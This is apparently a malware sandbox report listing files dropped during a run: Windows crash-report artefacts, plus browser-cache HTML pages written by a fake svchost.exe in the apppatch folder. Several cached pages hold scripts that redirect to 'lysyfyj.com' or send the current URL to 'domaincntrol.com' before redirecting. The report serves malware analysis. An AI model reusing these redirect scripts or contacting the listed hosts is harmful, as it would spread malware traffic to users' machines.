Size (bytes):	13340
Entropy (8bit):	2.685548034667581
Encrypted:	false
SSDEEP:	96:TiZYWAKsz6bYdEY7W0HSPYEZtztHiLItI1Pw+inN7aZ3a+JM+J/IzA3:2ZD9h/+TiN7aZ3aOM+JQzA3
MD5:	8D4A0C68FB0386797A89274B9EB6C576
SHA1:	D9894C057FB8704321EFC302099DB7A2929339D0
SHA-256:	8835DE5D48D6139FD4D401CED1CD9EA394EE6CC1D8ED46DFF9B575F625B1F749
SHA-512:	52140B92A55E67E9F7D8FF1D1F03E7B77231C97D6E4B77B69E1F199C4861966A99A033962A3A8F4C89C8AD6BDECD7529DD3CEC6A8890F339BC800ABAAFAC3C87
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF241.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 23 16:47:35 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	106294
Entropy (8bit):	1.8536990565115703
Encrypted:	false
SSDEEP:	384:MXQPzMcTsSnHbobPqhRdkECgDyKpVNWrTlm4OXk:D7DTssuShRKECYp/W9k0
MD5:	DB6B26DCD54C79059B290F4003A7EA27
SHA1:	409AC4E4BBDFC6418FE5259E881E4BC78630D243
SHA-256:	4B5E81B569B8A7F163C94E8FC931E13A52DB735465FF6428FD6C0F8475349383
SHA-512:	239DBB1B7712A5D96B1582D0781B6F7CD5434FD05204F3FEFBFDA5CCBB70702761B63F0FC5450B4719232A2CCD4EE8D103B985575006C176E71EFB45378C550D
Malicious:	false
Preview:	MDMP..a..... .......'..f........................l...........t....B..........T.......8...........T............!...}..........X...........D...............................................................................eJ..............GenuineIntel............T..............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF426.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8380
Entropy (8bit):	3.7111713651399394
Encrypted:	false
SSDEEP:	192:R6l7wVeJg56m6Y9vSU9BFgmfOepr189bOzsfe6m:R6lXJm6m6YFSU9BFgmfOpOYfa
MD5:	55EE2083EA1DE6C15B7B3FD416814D11
SHA1:	23439E1A2741298A36011E20B1C5BA42C8FBB296
SHA-256:	4A3B8379ED16417C8E2C5F08DA553121B3D767C637967387CECBB088F9B98463
SHA-512:	AF3E7282036DB66F7271F4211D488C242A32B5A9C2B7A54E458A85C6D699425B3943984EAFFCB3AACDF72D037CF8536C3449722DB5A29B788693FF544E67E02D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF550.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4649
Entropy (8bit):	4.521087491909925
Encrypted:	false
SSDEEP:	48:cvIwWl8zs/Jg77aI9cyyWpW8VYepYm8M4J0qFi+q8c901JLjd:uIjfhI7iu7V6JsEPLjd
MD5:	C2F94DB1373AEB25744268ADD852B91D
SHA1:	4E1B0D9C20B8F09C20D6902D985C0CC304FF0B45
SHA-256:	E17E4A0456CA103399AC0FB1A4DF3E3DE7F6939E03DD100A14A4EA3CC738A4A0
SHA-512:	912A51D1465B9692DD10DF8399D61D8460975757120F132A19F0787C419718F594CD25B640162B93060AA0AF5D05EFB69A228F3B0F076B78C4A4DF93DFD67A71
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="468470" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF600.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	81426
Entropy (8bit):	3.057969705833061
Encrypted:	false
SSDEEP:	768:nu2FV0/Jjq3AuVqYQIRwrSjOjqZr/jaPeIs/wmLEol:nu2P0/JjqjQV8wrYMqleP9s/jwol
MD5:	E0AAE8FBDEB4F647EF93D4CAB04AFF31
SHA1:	06F0E51590831108A2A357AD7937D984B603A159
SHA-256:	BE0820B6942AA3964F335BF988510F9016E0A5C8D1107CD88B3428BCE678E8D0
SHA-512:	FA86B6DD3D093557054798D563AE3F33711D3E3A29622DF47475806DB3C9A6A3F328591637E79453EA7E1AC536C781DB7D1628D97B959A4307475404B06D3B0B
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF6EB.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.685699206796057
Encrypted:	false
SSDEEP:	96:TiZYWqK9NGlUYKYpWlHSZYEZBUtHioIcIAGwyRza3z3aWMeJQIH+A3:2ZDKUtSJ1aj3aWMeJnH+A3
MD5:	EA0CD9791466905CC7E90F81135FF7C6
SHA1:	DFEB78FE7A8FF12DF9423F069DDC7C9B211DA440
SHA-256:	2825E3E27B811D96CF1F1F0DCE9D55C31E07E5A92BA2706C93178AD8C8E66697
SHA-512:	FA4BA8C2FAA5F0D8DFC87F922AAF2FC80EC6A81EC29DED3B96A40CC057C9D5A4170F05068B685CCB3CA341AC16B276A8857ADB0099744897FFBCA16347FAAEE5
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\login[2].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with very long lines (481), with no line terminators
Category:	dropped
Size (bytes):	481
Entropy (8bit):	5.739006515831124
Encrypted:	false
SSDEEP:	12:kxvsCk9cE3MxlVT/XvWGqJbJXHU3mmp1ACYI:kbxxlVT/OVJXDmpKZI
MD5:	04C7AF081E0A2E11F209EDA6ECF173C0
SHA1:	B5C145EADB12234EC620A2CD84842D612496F569
SHA-256:	6FAA78E452188C9BC897B1CDC8D47649A5F6FAFFA01EBA8B117FA39C011327F1
SHA-512:	19788746A4608EFD77DCB1C6E2B8F0398DFDCA93379146196829E3015043A3BE20EC20AAF2996730A57B921B87DBC6395C789DDAA9BB2B22A92F9E164149010C
Malicious:	false
Preview:	<html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNDQzODgyMiwiaWF0IjoxNzI0NDMxNjIyLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydm42aXI0NDFoMHRhMnY2YWcwYmFmNDYiLCJuYmYiOjE3MjQ0MzE2MjIsInRzIjoxNzI0NDMxNjIyMTIyMjA4fQ.BHCRiez0Con86KddMGsehpcTbWt4MqaQk6ziSlKmf8I&sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88');</script></body></html>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\login[3].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.470551863591405
Encrypted:	false
SSDEEP:	12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
MD5:	3B03D93D3487806337B5C6443CE7A62D
SHA1:	93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
SHA-256:	7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
SHA-512:	770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
Malicious:	false
Preview:	<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\login[1].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with very long lines (481), with no line terminators
Category:	dropped
Size (bytes):	481
Entropy (8bit):	5.81002766472882
Encrypted:	false
SSDEEP:	12:kxvsCk9cE3MxlVT/XK+rJbi42DC3lmOE1bACYI:kbxxlVT/fmOE1kZI
MD5:	108AB2AF67DF50E7931DD7A6AF9917CE
SHA1:	7B78836D0E00FF2C6B84159F7A228762706C3E4F
SHA-256:	9565E5E9CB146F8A47032A0EF83850D1BA657D4137C0BA43EB35702A8567764B
SHA-512:	96DA8DE6B6053EC6A96376AD6E7781D7F63EFF397EA462006B47A533FFF27F51C996C3489D6BD6CD22272D5DC2DA2130074796FE8D16F334A51A94C1F98D0C3E
Malicious:	false
Preview:	<html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNDQzODkzOSwiaWF0IjoxNzI0NDMxNzM5LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydm42ajF2MWk4bGRuZGF0MWcwYmNxNDciLCJuYmYiOjE3MjQ0MzE3MzksInRzIjoxNzI0NDMxNzM5NjU1MzU3fQ.93jHNDe653NfZkCJsNnTuXM0ey0AS4uxh9LM4mPx99U&sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88');</script></body></html>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\login[2].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	4.43096450882803
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
MD5:	7A5DF79FBAAFF2C161C6E29461785403
SHA1:	89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
SHA-256:	B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
SHA-512:	19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\login[3].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.470551863591405
Encrypted:	false
SSDEEP:	12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
MD5:	3B03D93D3487806337B5C6443CE7A62D
SHA1:	93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
SHA-256:	7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
SHA-512:	770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
Malicious:	false
Preview:	<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\login[4].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	4.43096450882803
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
MD5:	7A5DF79FBAAFF2C161C6E29461785403
SHA1:	89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
SHA-256:	B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
SHA-512:	19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\login[1].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	4.43096450882803
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
MD5:	7A5DF79FBAAFF2C161C6E29461785403
SHA1:	89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
SHA-256:	B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
SHA-512:	19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\login[2].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	4.43096450882803
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
MD5:	7A5DF79FBAAFF2C161C6E29461785403
SHA1:	89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
SHA-256:	B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
SHA-512:	19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\login[3].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.470551863591405
Encrypted:	false
SSDEEP:	12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
MD5:	3B03D93D3487806337B5C6443CE7A62D
SHA1:	93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
SHA-256:	7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
SHA-512:	770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
Malicious:	false
Preview:	<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\login[4].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (10731), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	42957
Entropy (8bit):	6.0662381358164685
Encrypted:	false
SSDEEP:	768:CiBtrifZVO7Wg3hIBY1P0NY7JXwNAk07VjAkpAk/AkyAks5y+PdiGPtYbcq:C8Cg3N8KFwVkZPtYbcq
MD5:	62DD18B056C55F5C4A6A679969B9EC09
SHA1:	8ED511EC43ECB810AFDF58F73792341EE559E291
SHA-256:	8FA8FB7E333A1972D6FC3DE209556A75ECAE4918834015C1799CBD4D803D449A
SHA-512:	1674C32123A4E637BCC8F425D4803F038773CE2727877C6A93D0774DD1C071EC7CA612C4AD24B74A719626A913205A5DCE967FD610A1675047F3FD9C5388CD83
Malicious:	false
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html>..<head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">.. <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)\|\|window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\login[1].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	4.43096450882803
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
MD5:	7A5DF79FBAAFF2C161C6E29461785403
SHA1:	89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
SHA-256:	B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
SHA-512:	19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\login[2].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	4.43096450882803
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
MD5:	7A5DF79FBAAFF2C161C6E29461785403
SHA1:	89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
SHA-256:	B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
SHA-512:	19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

C:\Users\user\AppData\Local\Temp\65FF.tmp

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	24649
Entropy (8bit):	7.9805373175957826
Encrypted:	false
SSDEEP:	384:P0YZ3Jjaxk9sU4B5xLlrzEoqsdNDRXY0F/6sstkMA3geAaD47owr:dZ3VGB5h6iNtoqpbQeR47owr
MD5:	47FD1D45FC00D6C4907A204812B6526C
SHA1:	B257C32FE7479CC7154DFD2F1B7E3F42CF522A3E
SHA-256:	84B9C42160AAEC75D3BEC21253D9D43509BEEB5D191B7AAEE1DB44FBF0A51948
SHA-512:	DFDBD40DEEB6D3865F656CC1715EF0A202979A8B49A70E21EBA6B56D3C452F2D88444C3A742337F4600F023B0E7789547035EEA292BA4195F9845BA5F5883DF5
Malicious:	false
